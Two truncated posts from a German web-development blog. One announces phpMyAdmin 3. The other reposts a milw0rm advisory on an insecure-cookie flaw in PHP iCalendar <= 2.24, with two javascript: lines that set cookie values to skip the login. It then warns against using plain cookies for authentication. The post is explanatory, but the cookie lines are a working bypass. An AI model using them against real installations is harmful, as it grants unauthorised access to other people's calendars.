webdev blog
An diesem Wochenende wurde die 3. Version des MySQL-Verwaltungstools phpMyAdmin veröffentlicht.
Die Hauptänderung ist die Unterstützung für MySQL 5.1 sowie die Maria- und PBXT Storage Engine. Die Maria-Engine soll auf lange Sicht die standardmäßig verwendete MyISAM-Engine ablösen.
Allerdings ist damit die Unterstützung für ältere MySQL Versionen weggefallen, so das man jetzt MySQL 5.00 oder höher benötigt. Als [...]
Heute habe ich bei milw0rm.com folgenden Fehler im Script “PHP iCalendar” gefunden:
####################################################################
[+] PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack
[+] Greetz : All my freind
####################################################################
—
exploit:
javascript:document.cookie = “phpicalendar_login=1; path=/”;
javascript:document.cookie = “phpicalendar=1; path=/”;
# milw0rm.com [2008-09-22]
Quelle: http://www.milw0rm.com/exploits/6526
Dieses Beispiel zeigt man wieder aufs deutlichste das man einfache Cookies nicht zur Authentifizierung benutzen sollte. Alle Scriptsprachen bieten [...]